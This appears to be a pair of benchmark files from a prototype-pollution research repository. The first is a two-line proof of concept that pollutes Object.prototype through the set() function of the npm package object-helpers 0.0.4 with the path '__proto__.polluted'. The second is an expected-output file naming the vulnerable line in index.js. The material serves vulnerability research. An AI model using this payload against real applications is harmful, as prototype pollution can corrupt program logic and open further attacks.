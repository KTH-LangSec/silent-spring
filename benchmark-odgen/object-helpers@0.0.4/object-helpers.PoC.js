const ObjHelpers = require('./object-helpers@0.0.4')
ObjHelpers.set({}, '__proto__.polluted', 'yes');
