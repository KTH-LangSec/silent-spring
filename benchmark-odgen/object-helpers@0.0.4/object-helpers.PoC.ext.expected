object-helpers@0.0.4/index.js:47:9